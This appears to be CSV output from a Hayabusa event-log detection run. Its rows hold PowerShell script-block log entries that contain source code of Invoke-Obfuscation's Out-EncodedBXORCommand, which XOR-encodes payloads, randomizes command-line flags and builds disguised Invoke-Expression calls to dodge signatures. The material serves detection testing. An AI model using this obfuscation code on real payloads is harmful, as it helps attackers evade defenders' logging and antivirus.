If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. $HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. $Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. $HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = 